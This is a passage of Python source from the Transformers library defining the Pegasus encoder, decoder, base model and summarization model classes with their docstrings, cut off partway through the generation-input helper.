PEGASUS_INPUTS_DOCSTRING = r"""
Args:
input_ids (:obj:`torch.LongTensor` of shape :obj:`(batch_size, sequence_length)`):
Indices of input sequence tokens in the vocabulary. Padding will be ignored by default should you provide
it.
Indices can be obtained using :class:`~transformers.PegasusTokenizer`. See
:meth:`transformers.PreTrainedTokenizer.encode` and :meth:`transformers.PreTrainedTokenizer.__call__` for
details.
`What are input IDs? <../glossary.html#input-ids>`__
attention_mask (:obj:`torch.Tensor` of shape :obj:`(batch_size, sequence_length)`, `optional`):
Mask to avoid performing attention on padding token indices. Mask values selected in ``[0, 1]``:
- 1 for tokens that are **not masked**,
- 0 for tokens that are **masked**.
`What are attention masks? <../glossary.html#attention-mask>`__
decoder_input_ids (:obj:`torch.LongTensor` of shape :obj:`(batch_size, target_sequence_length)`, `optional`):
Indices of decoder input sequence tokens in the vocabulary.
Indices can be obtained using :class:`~transformers.PegasusTokenizer`. See
:meth:`transformers.PreTrainedTokenizer.encode` and :meth:`transformers.PreTrainedTokenizer.__call__` for
details.
`What are decoder input IDs? <../glossary.html#decoder-input-ids>`__
Pegasus uses the :obj:`pad_token_id` as the starting token for :obj:`decoder_input_ids` generation. If
:obj:`past_key_values` is used, optionally only the last :obj:`decoder_input_ids` have to be input (see
:obj:`past_key_values`).
decoder_attention_mask (:obj:`torch.LongTensor` of shape :obj:`(batch_size, target_sequence_length)`, `optional`):
Default behavior: generate a tensor that ignores pad tokens in :obj:`decoder_input_ids`. Causal mask will
also be used by default.
head_mask (:obj:`torch.Tensor` of shape :obj:`(encoder_layers, encoder_attention_heads)`, `optional`):
Mask to nullify selected heads of the attention modules in the encoder. Mask values selected in ``[0, 1]``:
- 1 indicates the head is **not masked**,
- 0 indicates the head is **masked**.
decoder_head_mask (:obj:`torch.Tensor` of shape :obj:`(decoder_layers, decoder_attention_heads)`, `optional`):
Mask to nullify selected heads of the attention modules in the decoder. Mask values selected in ``[0, 1]``:
- 1 indicates the head is **not masked**,
- 0 indicates the head is **masked**.
cross_attn_head_mask (:obj:`torch.Tensor` of shape :obj:`(decoder_layers, decoder_attention_heads)`, `optional`):
Mask to nullify selected heads of the cross-attention modules in the decoder. Mask values selected in ``[0,
1]``:
- 1 indicates the head is **not masked**,
- 0 indicates the head is **masked**.
encoder_outputs (:obj:`tuple(tuple(torch.FloatTensor)`, `optional`):
Tuple consists of (:obj:`last_hidden_state`, `optional`: :obj:`hidden_states`, `optional`:
:obj:`attentions`) :obj:`last_hidden_state` of shape :obj:`(batch_size, sequence_length, hidden_size)`,
`optional`) is a sequence of hidden-states at the output of the last layer of the encoder. Used in the
cross-attention of the decoder.
past_key_values (:obj:`tuple(tuple(torch.FloatTensor))`, `optional`, returned when ``use_cache=True`` is passed or when ``config.use_cache=True``):
Tuple of :obj:`tuple(torch.FloatTensor)` of length :obj:`config.n_layers`, with each tuple having 2 tensors
of shape :obj:`(batch_size, num_heads, sequence_length, embed_size_per_head)`) and 2 additional tensors of
shape :obj:`(batch_size, num_heads, encoder_sequence_length, embed_size_per_head)`.
Contains pre-computed hidden-states (key and values in the self-attention blocks and in the cross-attention
blocks) that can be used (see :obj:`past_key_values` input) to speed up sequential decoding.
If :obj:`past_key_values` are used, the user can optionally input only the last :obj:`decoder_input_ids`
(those that don't have their past key value states given to this model) of shape :obj:`(batch_size, 1)`
            instead of all :obj:`decoder_input_ids` of shape :obj:`(batch_size, sequence_length)`.
inputs_embeds (:obj:`torch.FloatTensor` of shape :obj:`(batch_size, sequence_length, hidden_size)`, `optional`):
Optionally, instead of passing :obj:`input_ids` you can choose to directly pass an embedded representation.
This is useful if you want more control over how to convert :obj:`input_ids` indices into associated
vectors than the model's internal embedding lookup matrix.
decoder_inputs_embeds (:obj:`torch.FloatTensor` of shape :obj:`(batch_size, target_sequence_length, hidden_size)`, `optional`):
Optionally, instead of passing :obj:`decoder_input_ids` you can choose to directly pass an embedded
representation. If :obj:`past_key_values` is used, optionally only the last :obj:`decoder_inputs_embeds`
have to be input (see :obj:`past_key_values`). This is useful if you want more control over how to convert
:obj:`decoder_input_ids` indices into associated vectors than the model's internal embedding lookup matrix.
If :obj:`decoder_input_ids` and :obj:`decoder_inputs_embeds` are both unset, :obj:`decoder_inputs_embeds`
takes the value of :obj:`inputs_embeds`.
use_cache (:obj:`bool`, `optional`):
If set to :obj:`True`, :obj:`past_key_values` key value states are returned and can be used to speed up
decoding (see :obj:`past_key_values`).
output_attentions (:obj:`bool`, `optional`):
Whether or not to return the attentions tensors of all attention layers. See ``attentions`` under returned
tensors for more detail.
output_hidden_states (:obj:`bool`, `optional`):
Whether or not to return the hidden states of all layers. See ``hidden_states`` under returned tensors for
more detail.
return_dict (:obj:`bool`, `optional`):
Whether or not to return a :class:`~transformers.file_utils.ModelOutput` instead of a plain tuple.
"""
class PegasusEncoder(PegasusPreTrainedModel):
"""
Transformer encoder consisting of *config.encoder_layers* self attention layers. Each layer is a
:class:`PegasusEncoderLayer`.
Args:
config: PegasusConfig
embed_tokens (nn.Embedding): output embedding
"""
def __init__(self, config: PegasusConfig, embed_tokens: Optional[nn.Embedding] = None):
super().__init__(config)
self.dropout = config.dropout
self.layerdrop = config.encoder_layerdrop
embed_dim = config.d_model
self.padding_idx = config.pad_token_id
self.max_source_positions = config.max_position_embeddings
self.embed_scale = math.sqrt(embed_dim) if config.scale_embedding else 1.0
if embed_tokens is not None:
self.embed_tokens = embed_tokens
else:
self.embed_tokens = nn.Embedding(config.vocab_size, embed_dim, self.padding_idx)
self.embed_positions = PegasusSinusoidalPositionalEmbedding(
config.max_position_embeddings,
embed_dim,
self.padding_idx,
)
self.layers = nn.ModuleList([PegasusEncoderLayer(config) for _ in range(config.encoder_layers)])
self.layer_norm = nn.LayerNorm(config.d_model)
self.init_weights()
def resize_position_embeddings(self, new_num_position_embeddings: int):
"""
Resizes position embeddings matrix of the model if :obj:`new_num_position_embeddings !=
config.max_position_embeddings`.
Arguments:
new_num_position_embeddings (:obj:`int`):
The number of new position embeddings. If position embeddings are learned, increasing the size will add
newly initialized vectors at the end, whereas reducing the size will remove vectors from the end. If
position embeddings are not learned (*e.g.* sinusoidal position embeddings), increasing the size will
add correct vectors at the end following the position encoding algorithm, whereas reducing the size
will remove vectors from the end.
"""
logger.info(f"Setting `config.max_position_embeddings={new_num_position_embeddings}`...")
self.config.max_position_embeddings = new_num_position_embeddings
self.embed_positions = PegasusSinusoidalPositionalEmbedding(
self.config.max_position_embeddings,
self.config.d_model,
self.padding_idx,
)
def get_position_embeddings(self) -> nn.Embedding:
"""
Returns the position embeddings matrix
"""
return self.embed_positions
def forward(
self,
input_ids=None,
attention_mask=None,
head_mask=None,
inputs_embeds=None,
output_attentions=None,
output_hidden_states=None,
return_dict=None,
):
r"""
Args:
input_ids (:obj:`torch.LongTensor` of shape :obj:`(batch_size, sequence_length)`):
Indices of input sequence tokens in the vocabulary. Padding will be ignored by default should you
provide it.
Indices can be obtained using :class:`~transformers.PegasusTokenizer`. See
:meth:`transformers.PreTrainedTokenizer.encode` and :meth:`transformers.PreTrainedTokenizer.__call__`
for details.
`What are input IDs? <../glossary.html#input-ids>`__
attention_mask (:obj:`torch.Tensor` of shape :obj:`(batch_size, sequence_length)`, `optional`):
Mask to avoid performing attention on padding token indices. Mask values selected in ``[0, 1]``:
- 1 for tokens that are **not masked**,
- 0 for tokens that are **masked**.
`What are attention masks? <../glossary.html#attention-mask>`__
head_mask (:obj:`torch.Tensor` of shape :obj:`(encoder_layers, encoder_attention_heads)`, `optional`):
Mask to nullify selected heads of the attention modules. Mask values selected in ``[0, 1]``:
- 1 indicates the head is **not masked**,
- 0 indicates the head is **masked**.
inputs_embeds (:obj:`torch.FloatTensor` of shape :obj:`(batch_size, sequence_length, hidden_size)`, `optional`):
Optionally, instead of passing :obj:`input_ids` you can choose to directly pass an embedded
representation. This is useful if you want more control over how to convert :obj:`input_ids` indices
into associated vectors than the model's internal embedding lookup matrix.
output_attentions (:obj:`bool`, `optional`):
Whether or not to return the attentions tensors of all attention layers. See ``attentions`` under
returned tensors for more detail.
output_hidden_states (:obj:`bool`, `optional`):
Whether or not to return the hidden states of all layers. See ``hidden_states`` under returned tensors
for more detail.
return_dict (:obj:`bool`, `optional`):
Whether or not to return a :class:`~transformers.file_utils.ModelOutput` instead of a plain tuple.
"""
output_attentions = output_attentions if output_attentions is not None else self.config.output_attentions
output_hidden_states = (
output_hidden_states if output_hidden_states is not None else self.config.output_hidden_states
)
return_dict = return_dict if return_dict is not None else self.config.use_return_dict
# retrieve input_ids and inputs_embeds
if input_ids is not None and inputs_embeds is not None:
raise ValueError("You cannot specify both input_ids and inputs_embeds at the same time")
elif input_ids is not None:
input_shape = input_ids.size()
input_ids = input_ids.view(-1, input_shape[-1])
elif inputs_embeds is not None:
input_shape = inputs_embeds.size()[:-1]
else:
raise ValueError("You have to specify either input_ids or inputs_embeds")
if inputs_embeds is None:
inputs_embeds = self.embed_tokens(input_ids) * self.embed_scale
embed_pos = self.embed_positions(input_shape)
hidden_states = inputs_embeds + embed_pos
hidden_states = nn.functional.dropout(hidden_states, p=self.dropout, training=self.training)
# expand attention_mask
if attention_mask is not None:
# [bsz, seq_len] -> [bsz, 1, tgt_seq_len, src_seq_len]
attention_mask = _expand_mask(attention_mask, inputs_embeds.dtype)
encoder_states = () if output_hidden_states else None
all_attentions = () if output_attentions else None
# check if head_mask has a correct number of layers specified if desired
if head_mask is not None:
assert head_mask.size()[0] == (
len(self.layers)
), f"The head_mask should be specified for {len(self.layers)} layers, but it is for {head_mask.size()[0]}."
for idx, encoder_layer in enumerate(self.layers):
if output_hidden_states:
encoder_states = encoder_states + (hidden_states,)
# add LayerDrop (see https://arxiv.org/abs/1909.11556 for description)
dropout_probability = random.uniform(0, 1)
if self.training and (dropout_probability < self.layerdrop): # skip the layer
layer_outputs = (None, None)
else:
if getattr(self.config, "gradient_checkpointing", False) and self.training:
def create_custom_forward(module):
def custom_forward(*inputs):
return module(*inputs, output_attentions)
return custom_forward
layer_outputs = torch.utils.checkpoint.checkpoint(
create_custom_forward(encoder_layer),
hidden_states,
attention_mask,
(head_mask[idx] if head_mask is not None else None),
)
else:
layer_outputs = encoder_layer(
hidden_states,
attention_mask,
layer_head_mask=(head_mask[idx] if head_mask is not None else None),
output_attentions=output_attentions,
)
hidden_states = layer_outputs[0]
if output_attentions:
all_attentions = all_attentions + (layer_outputs[1],)
hidden_states = self.layer_norm(hidden_states)
if output_hidden_states:
encoder_states = encoder_states + (hidden_states,)
if not return_dict:
return tuple(v for v in [hidden_states, encoder_states, all_attentions] if v is not None)
return BaseModelOutput(
last_hidden_state=hidden_states, hidden_states=encoder_states, attentions=all_attentions
)
class PegasusDecoder(PegasusPreTrainedModel):
"""
Transformer decoder consisting of *config.decoder_layers* layers. Each layer is a :class:`PegasusDecoderLayer`
Args:
config: PegasusConfig
embed_tokens (nn.Embedding): output embedding
"""
def __init__(self, config: PegasusConfig, embed_tokens: Optional[nn.Embedding] = None):
super().__init__(config)
self.dropout = config.dropout
self.layerdrop = config.decoder_layerdrop
self.padding_idx = config.pad_token_id
self.max_target_positions = config.max_position_embeddings
self.embed_scale = math.sqrt(config.d_model) if config.scale_embedding else 1.0
if embed_tokens is not None:
self.embed_tokens = embed_tokens
else:
self.embed_tokens = nn.Embedding(config.vocab_size, config.d_model, self.padding_idx)
self.embed_positions = PegasusSinusoidalPositionalEmbedding(
config.max_position_embeddings,
config.d_model,
self.padding_idx,
)
self.layers = nn.ModuleList([PegasusDecoderLayer(config) for _ in range(config.decoder_layers)])
self.layer_norm = nn.LayerNorm(config.d_model)
self.init_weights()
def get_input_embeddings(self):
return self.embed_tokens
def set_input_embeddings(self, value):
self.embed_tokens = value
# Copied from transformers.models.bart.modeling_bart.BartDecoder._prepare_decoder_attention_mask
def _prepare_decoder_attention_mask(self, attention_mask, input_shape, inputs_embeds, past_key_values_length):
# create causal mask
# [bsz, seq_len] -> [bsz, 1, tgt_seq_len, src_seq_len]
combined_attention_mask = None
if input_shape[-1] > 1:
combined_attention_mask = _make_causal_mask(
input_shape, inputs_embeds.dtype, past_key_values_length=past_key_values_length
).to(self.device)
if attention_mask is not None:
# [bsz, seq_len] -> [bsz, 1, tgt_seq_len, src_seq_len]
expanded_attn_mask = _expand_mask(attention_mask, inputs_embeds.dtype, tgt_len=input_shape[-1])
combined_attention_mask = (
expanded_attn_mask if combined_attention_mask is None else expanded_attn_mask + combined_attention_mask
)
return combined_attention_mask
def resize_position_embeddings(self, new_num_position_embeddings: int):
"""
Resizes position embeddings matrix of the model if :obj:`new_num_position_embeddings !=
config.max_position_embeddings`.
Arguments:
new_num_position_embeddings (:obj:`int`):
The number of new position embeddings. If position embeddings are learned, increasing the size will add
newly initialized vectors at the end, whereas reducing the size will remove vectors from the end. If
position embeddings are not learned (*e.g.* sinusoidal position embeddings), increasing the size will
add correct vectors at the end following the position encoding algorithm, whereas reducing the size
will remove vectors from the end.
"""
logger.info(f"Setting `config.max_position_embeddings={new_num_position_embeddings}`...")
self.config.max_position_embeddings = new_num_position_embeddings
self.embed_positions = PegasusSinusoidalPositionalEmbedding(
self.config.max_position_embeddings,
self.config.d_model,
self.padding_idx,
)
def get_position_embeddings(self) -> nn.Embedding:
"""
Returns the position embeddings matrix
"""
return self.embed_positions
def forward(
self,
input_ids=None,
attention_mask=None,
encoder_hidden_states=None,
encoder_attention_mask=None,
head_mask=None,
cross_attn_head_mask=None,
past_key_values=None,
inputs_embeds=None,
use_cache=None,
output_attentions=None,
output_hidden_states=None,
return_dict=None,
):
r"""
Args:
input_ids (:obj:`torch.LongTensor` of shape :obj:`(batch_size, sequence_length)`):
Indices of input sequence tokens in the vocabulary. Padding will be ignored by default should you
provide it.
Indices can be obtained using :class:`~transformers.PegasusTokenizer`. See
:meth:`transformers.PreTrainedTokenizer.encode` and :meth:`transformers.PreTrainedTokenizer.__call__`
for details.
`What are input IDs? <../glossary.html#input-ids>`__
attention_mask (:obj:`torch.Tensor` of shape :obj:`(batch_size, sequence_length)`, `optional`):
Mask to avoid performing attention on padding token indices. Mask values selected in ``[0, 1]``:
- 1 for tokens that are **not masked**,
- 0 for tokens that are **masked**.
`What are attention masks? <../glossary.html#attention-mask>`__
encoder_hidden_states (:obj:`torch.FloatTensor` of shape :obj:`(batch_size, encoder_sequence_length, hidden_size)`, `optional`):
Sequence of hidden-states at the output of the last layer of the encoder. Used in the cross-attention
of the decoder.
encoder_attention_mask (:obj:`torch.LongTensor` of shape :obj:`(batch_size, encoder_sequence_length)`, `optional`):
                Mask to avoid performing cross-attention on padding token indices of encoder input_ids. Mask values
selected in ``[0, 1]``:
- 1 for tokens that are **not masked**,
- 0 for tokens that are **masked**.
`What are attention masks? <../glossary.html#attention-mask>`__
head_mask (:obj:`torch.Tensor` of shape :obj:`(decoder_layers, decoder_attention_heads)`, `optional`):
Mask to nullify selected heads of the attention modules. Mask values selected in ``[0, 1]``:
- 1 indicates the head is **not masked**,
- 0 indicates the head is **masked**.
cross_attn_head_mask (:obj:`torch.Tensor` of shape :obj:`(decoder_layers, decoder_attention_heads)`, `optional`):
Mask to nullify selected heads of the cross-attention modules in decoder to avoid performing
cross-attention on hidden heads. Mask values selected in ``[0, 1]``:
- 1 indicates the head is **not masked**,
- 0 indicates the head is **masked**.
past_key_values (:obj:`tuple(tuple(torch.FloatTensor))`, `optional`, returned when ``use_cache=True`` is passed or when ``config.use_cache=True``):
Tuple of :obj:`tuple(torch.FloatTensor)` of length :obj:`config.n_layers`, with each tuple having 2
tensors of shape :obj:`(batch_size, num_heads, sequence_length, embed_size_per_head)`) and 2 additional
tensors of shape :obj:`(batch_size, num_heads, encoder_sequence_length, embed_size_per_head)`.
Contains pre-computed hidden-states (key and values in the self-attention blocks and in the
cross-attention blocks) that can be used (see :obj:`past_key_values` input) to speed up sequential
decoding.
If :obj:`past_key_values` are used, the user can optionally input only the last
:obj:`decoder_input_ids` (those that don't have their past key value states given to this model) of
                shape :obj:`(batch_size, 1)` instead of all :obj:`decoder_input_ids` of shape :obj:`(batch_size,
sequence_length)`.
inputs_embeds (:obj:`torch.FloatTensor` of shape :obj:`(batch_size, sequence_length, hidden_size)`, `optional`):
Optionally, instead of passing :obj:`input_ids` you can choose to directly pass an embedded
representation. This is useful if you want more control over how to convert :obj:`input_ids` indices
into associated vectors than the model's internal embedding lookup matrix.
output_attentions (:obj:`bool`, `optional`):
Whether or not to return the attentions tensors of all attention layers. See ``attentions`` under
returned tensors for more detail.
output_hidden_states (:obj:`bool`, `optional`):
Whether or not to return the hidden states of all layers. See ``hidden_states`` under returned tensors
for more detail.
return_dict (:obj:`bool`, `optional`):
Whether or not to return a :class:`~transformers.file_utils.ModelOutput` instead of a plain tuple.
"""
output_attentions = output_attentions if output_attentions is not None else self.config.output_attentions
output_hidden_states = (
output_hidden_states if output_hidden_states is not None else self.config.output_hidden_states
)
use_cache = use_cache if use_cache is not None else self.config.use_cache
return_dict = return_dict if return_dict is not None else self.config.use_return_dict
# retrieve input_ids and inputs_embeds
if input_ids is not None and inputs_embeds is not None:
raise ValueError("You cannot specify both decoder_input_ids and decoder_inputs_embeds at the same time")
elif input_ids is not None:
input_shape = input_ids.size()
input_ids = input_ids.view(-1, input_shape[-1])
elif inputs_embeds is not None:
input_shape = inputs_embeds.size()[:-1]
else:
raise ValueError("You have to specify either decoder_input_ids or decoder_inputs_embeds")
# past_key_values_length
past_key_values_length = past_key_values[0][0].shape[2] if past_key_values is not None else 0
if inputs_embeds is None:
inputs_embeds = self.embed_tokens(input_ids) * self.embed_scale
attention_mask = self._prepare_decoder_attention_mask(
attention_mask, input_shape, inputs_embeds, past_key_values_length
)
# expand encoder attention mask
if encoder_hidden_states is not None and encoder_attention_mask is not None:
# [bsz, seq_len] -> [bsz, 1, tgt_seq_len, src_seq_len]
encoder_attention_mask = _expand_mask(encoder_attention_mask, inputs_embeds.dtype, tgt_len=input_shape[-1])
# embed positions
positions = self.embed_positions(input_shape, past_key_values_length)
hidden_states = inputs_embeds + positions
hidden_states = nn.functional.dropout(hidden_states, p=self.dropout, training=self.training)
# decoder layers
all_hidden_states = () if output_hidden_states else None
all_self_attns = () if output_attentions else None
all_cross_attentions = () if (output_attentions and encoder_hidden_states is not None) else None
next_decoder_cache = () if use_cache else None
# check if head_mask/cross_attn_head_mask has a correct number of layers specified if desired
for attn_mask, mask_name in zip([head_mask, cross_attn_head_mask], ["head_mask", "cross_attn_head_mask"]):
if attn_mask is not None:
assert attn_mask.size()[0] == (
len(self.layers)
                ), f"The `{mask_name}` should be specified for {len(self.layers)} layers, but it is for {attn_mask.size()[0]}."
for idx, decoder_layer in enumerate(self.layers):
# add LayerDrop (see https://arxiv.org/abs/1909.11556 for description)
if output_hidden_states:
all_hidden_states += (hidden_states,)
dropout_probability = random.uniform(0, 1)
if self.training and (dropout_probability < self.layerdrop):
continue
past_key_value = past_key_values[idx] if past_key_values is not None else None
if getattr(self.config, "gradient_checkpointing", False) and self.training:
if use_cache:
logger.warning(
"`use_cache=True` is incompatible with `config.gradient_checkpointing=True`. Setting "
"`use_cache=False`..."
)
use_cache = False
def create_custom_forward(module):
def custom_forward(*inputs):
# None for past_key_value
return module(*inputs, output_attentions, use_cache)
return custom_forward
layer_outputs = torch.utils.checkpoint.checkpoint(
create_custom_forward(decoder_layer),
hidden_states,
attention_mask,
encoder_hidden_states,
encoder_attention_mask,
head_mask[idx] if head_mask is not None else None,
cross_attn_head_mask[idx] if cross_attn_head_mask is not None else None,
None,
)
else:
layer_outputs = decoder_layer(
hidden_states,
attention_mask=attention_mask,
encoder_hidden_states=encoder_hidden_states,
encoder_attention_mask=encoder_attention_mask,
layer_head_mask=(head_mask[idx] if head_mask is not None else None),
cross_attn_layer_head_mask=(
cross_attn_head_mask[idx] if cross_attn_head_mask is not None else None
),
past_key_value=past_key_value,
output_attentions=output_attentions,
use_cache=use_cache,
)
hidden_states = layer_outputs[0]
if use_cache:
next_decoder_cache += (layer_outputs[3 if output_attentions else 1],)
if output_attentions:
all_self_attns += (layer_outputs[1],)
if encoder_hidden_states is not None:
all_cross_attentions += (layer_outputs[2],)
hidden_states = self.layer_norm(hidden_states)
# add hidden states from the last decoder layer
if output_hidden_states:
all_hidden_states += (hidden_states,)
next_cache = next_decoder_cache if use_cache else None
if not return_dict:
return tuple(
v
for v in [hidden_states, next_cache, all_hidden_states, all_self_attns, all_cross_attentions]
if v is not None
)
return BaseModelOutputWithPastAndCrossAttentions(
last_hidden_state=hidden_states,
past_key_values=next_cache,
hidden_states=all_hidden_states,
attentions=all_self_attns,
cross_attentions=all_cross_attentions,
)
@add_start_docstrings(
"The bare PEGASUS Model outputting raw hidden-states without any specific head on top.",
PEGASUS_START_DOCSTRING,
)
class PegasusModel(PegasusPreTrainedModel):
def __init__(self, config: PegasusConfig):
super().__init__(config)
padding_idx, vocab_size = config.pad_token_id, config.vocab_size
self.shared = nn.Embedding(vocab_size, config.d_model, padding_idx)
self.encoder = PegasusEncoder(config, self.shared)
self.decoder = PegasusDecoder(config, self.shared)
self.init_weights()
def get_input_embeddings(self):
return self.shared
def set_input_embeddings(self, value):
self.shared = value
self.encoder.embed_tokens = self.shared
self.decoder.embed_tokens = self.shared
def get_encoder(self):
return self.encoder
def get_decoder(self):
return self.decoder
def resize_position_embeddings(self, new_num_position_embeddings: int):
"""
Resizes position embeddings matrix of the model if :obj:`new_num_position_embeddings !=
config.max_position_embeddings`.
Arguments:
new_num_position_embeddings (:obj:`int`):
The number of new position embeddings. If position embeddings are learned, increasing the size will add
newly initialized vectors at the end, whereas reducing the size will remove vectors from the end. If
position embeddings are not learned (*e.g.* sinusoidal position embeddings), increasing the size will
add correct vectors at the end following the position encoding algorithm, whereas reducing the size
will remove vectors from the end.
"""
self.config.max_position_embeddings = new_num_position_embeddings
self.encoder.resize_position_embeddings(new_num_position_embeddings)
self.decoder.resize_position_embeddings(new_num_position_embeddings)
def get_position_embeddings(self) -> Tuple[nn.Embedding]:
"""
Returns the position embeddings matrix
"""
return (self.encoder.get_position_embeddings(), self.decoder.get_position_embeddings())
@add_start_docstrings_to_model_forward(PEGASUS_INPUTS_DOCSTRING)
@replace_return_docstrings(output_type=Seq2SeqModelOutput, config_class=_CONFIG_FOR_DOC)
def forward(
self,
input_ids=None,
attention_mask=None,
decoder_input_ids=None,
decoder_attention_mask=None,
head_mask=None,
decoder_head_mask=None,
cross_attn_head_mask=None,
encoder_outputs=None,
past_key_values=None,
inputs_embeds=None,
decoder_inputs_embeds=None,
use_cache=None,
output_attentions=None,
output_hidden_states=None,
return_dict=None,
):
r"""
Returns:
Example::
>>> from transformers import PegasusTokenizer, PegasusModel
>>> tokenizer = PegasusTokenizer.from_pretrained("google/pegasus-large")
>>> model = PegasusModel.from_pretrained("google/pegasus-large")
>>> input_ids = tokenizer("Studies have been shown that owning a dog is good for you", return_tensors="pt").input_ids # Batch size 1
>>> decoder_input_ids = tokenizer("Studies show that", return_tensors="pt").input_ids # Batch size 1
>>> outputs = model(input_ids=input_ids, decoder_input_ids=decoder_input_ids)
>>> last_hidden_states = outputs.last_hidden_state
"""
output_attentions = output_attentions if output_attentions is not None else self.config.output_attentions
output_hidden_states = (
output_hidden_states if output_hidden_states is not None else self.config.output_hidden_states
)
use_cache = use_cache if use_cache is not None else self.config.use_cache
return_dict = return_dict if return_dict is not None else self.config.use_return_dict
if encoder_outputs is None:
encoder_outputs = self.encoder(
input_ids=input_ids,
attention_mask=attention_mask,
head_mask=head_mask,
inputs_embeds=inputs_embeds,
output_attentions=output_attentions,
output_hidden_states=output_hidden_states,
return_dict=return_dict,
)
# If the user passed a tuple for encoder_outputs, we wrap it in a BaseModelOutput when return_dict=True
elif return_dict and not isinstance(encoder_outputs, BaseModelOutput):
encoder_outputs = BaseModelOutput(
last_hidden_state=encoder_outputs[0],
hidden_states=encoder_outputs[1] if len(encoder_outputs) > 1 else None,
attentions=encoder_outputs[2] if len(encoder_outputs) > 2 else None,
)
# decoder outputs consists of (dec_features, past_key_value, dec_hidden, dec_attn)
decoder_outputs = self.decoder(
input_ids=decoder_input_ids,
attention_mask=decoder_attention_mask,
encoder_hidden_states=encoder_outputs[0],
encoder_attention_mask=attention_mask,
head_mask=decoder_head_mask,
cross_attn_head_mask=cross_attn_head_mask,
past_key_values=past_key_values,
inputs_embeds=decoder_inputs_embeds,
use_cache=use_cache,
output_attentions=output_attentions,
output_hidden_states=output_hidden_states,
return_dict=return_dict,
)
if not return_dict:
return decoder_outputs + encoder_outputs
return Seq2SeqModelOutput(
last_hidden_state=decoder_outputs.last_hidden_state,
past_key_values=decoder_outputs.past_key_values,
decoder_hidden_states=decoder_outputs.hidden_states,
decoder_attentions=decoder_outputs.attentions,
cross_attentions=decoder_outputs.cross_attentions,
encoder_last_hidden_state=encoder_outputs.last_hidden_state,
encoder_hidden_states=encoder_outputs.hidden_states,
encoder_attentions=encoder_outputs.attentions,
)
@add_start_docstrings(
"The PEGASUS Model with a language modeling head. Can be used for summarization.", PEGASUS_START_DOCSTRING
)
class PegasusForConditionalGeneration(PegasusPreTrainedModel):
base_model_prefix = "model"
_keys_to_ignore_on_load_missing = [
r"final_logits_bias",
r"encoder\.version",
r"decoder\.version",
r"lm_head\.weight",
r"embed_positions\.weight",
]
def __init__(self, config: PegasusConfig):
super().__init__(config)
self.model = PegasusModel(config)
self.register_buffer("final_logits_bias", torch.zeros((1, self.model.shared.num_embeddings)))
self.lm_head = nn.Linear(config.d_model, self.model.shared.num_embeddings, bias=False)
self.init_weights()
def get_encoder(self):
return self.model.get_encoder()
def get_decoder(self):
return self.model.get_decoder()
def resize_token_embeddings(self, new_num_tokens: int) -> nn.Embedding:
new_embeddings = super().resize_token_embeddings(new_num_tokens)
self._resize_final_logits_bias(new_num_tokens)
return new_embeddings
def _resize_final_logits_bias(self, new_num_tokens: int) -> None:
old_num_tokens = self.final_logits_bias.shape[-1]
if new_num_tokens <= old_num_tokens:
new_bias = self.final_logits_bias[:, :new_num_tokens]
else:
extra_bias = torch.zeros((1, new_num_tokens - old_num_tokens), device=self.final_logits_bias.device)
new_bias = torch.cat([self.final_logits_bias, extra_bias], dim=1)
self.register_buffer("final_logits_bias", new_bias)
def get_output_embeddings(self):
return self.lm_head
def set_output_embeddings(self, new_embeddings):
self.lm_head = new_embeddings
def resize_position_embeddings(self, new_num_position_embeddings: int):
"""
Resizes position embeddings matrix of the model if :obj:`new_num_position_embeddings !=
config.max_position_embeddings`.
Arguments:
new_num_position_embeddings (:obj:`int`):
The number of new position embeddings. If position embeddings are learned, increasing the size will add
newly initialized vectors at the end, whereas reducing the size will remove vectors from the end. If
position embeddings are not learned (*e.g.* sinusoidal position embeddings), increasing the size will
add correct vectors at the end following the position encoding algorithm, whereas reducing the size
will remove vectors from the end.
"""
self.config.max_position_embeddings = new_num_position_embeddings
self.model.encoder.resize_position_embeddings(new_num_position_embeddings)
self.model.decoder.resize_position_embeddings(new_num_position_embeddings)
def get_position_embeddings(self) -> Tuple[nn.Embedding]:
"""
Returns the position embeddings matrix
"""
return (self.model.encoder.get_position_embeddings(), self.model.decoder.get_position_embeddings())
@add_start_docstrings_to_model_forward(PEGASUS_INPUTS_DOCSTRING)
@replace_return_docstrings(output_type=Seq2SeqLMOutput, config_class=_CONFIG_FOR_DOC)
@add_end_docstrings(PEGASUS_GENERATION_EXAMPLE)
def forward(
self,
input_ids=None,
attention_mask=None,
decoder_input_ids=None,
decoder_attention_mask=None,
head_mask=None,
decoder_head_mask=None,
cross_attn_head_mask=None,
encoder_outputs=None,
past_key_values=None,
inputs_embeds=None,
decoder_inputs_embeds=None,
labels=None,
use_cache=None,
output_attentions=None,
output_hidden_states=None,
return_dict=None,
):
r"""
labels (:obj:`torch.LongTensor` of shape :obj:`(batch_size, sequence_length)`, `optional`):
Labels for computing the masked language modeling loss. Indices should either be in ``[0, ...,
config.vocab_size]`` or -100 (see ``input_ids`` docstring). Tokens with indices set to ``-100`` are ignored
(masked), the loss is only computed for the tokens with labels in ``[0, ..., config.vocab_size]``.
Returns:
"""
return_dict = return_dict if return_dict is not None else self.config.use_return_dict
if labels is not None:
if decoder_input_ids is None:
decoder_input_ids = shift_tokens_right(
labels, self.config.pad_token_id, self.config.decoder_start_token_id
)
outputs = self.model(
input_ids,
attention_mask=attention_mask,
decoder_input_ids=decoder_input_ids,
encoder_outputs=encoder_outputs,
decoder_attention_mask=decoder_attention_mask,
head_mask=head_mask,
decoder_head_mask=decoder_head_mask,
cross_attn_head_mask=cross_attn_head_mask,
past_key_values=past_key_values,
inputs_embeds=inputs_embeds,
decoder_inputs_embeds=decoder_inputs_embeds,
use_cache=use_cache,
output_attentions=output_attentions,
output_hidden_states=output_hidden_states,
return_dict=return_dict,
)
lm_logits = self.lm_head(outputs[0]) + self.final_logits_bias
masked_lm_loss = None
if labels is not None:
loss_fct = CrossEntropyLoss()
masked_lm_loss = loss_fct(lm_logits.view(-1, self.config.vocab_size), labels.view(-1))
if not return_dict:
output = (lm_logits,) + outputs[1:]
return ((masked_lm_loss,) + output) if masked_lm_loss is not None else output
return Seq2SeqLMOutput(
loss=masked_lm_loss,
logits=lm_logits,
past_key_values=outputs.past_key_values,
decoder_hidden_states=outputs.decoder_hidden_states,
decoder_attentions=outputs.decoder_attentions,
cross_attentions=outputs.cross_attentions,
encoder_last_hidden_state=outputs.encoder_last_hidden_state,
encoder_hidden_states=outputs.encoder_hidden_states,
encoder_attentions=outputs.encoder_attentions,
)
def prepare_inputs_for_generation(
self,
decoder_input_ids,
past=None,
attention_mask=None,
head_mask=None,
decoder_head_mask=None,
cross_attn_head_mask=None,
use_cache=None,
encoder_outputs=None,
**kwargs
):
# cut decoder_input_ids if past is used
if past is not None:
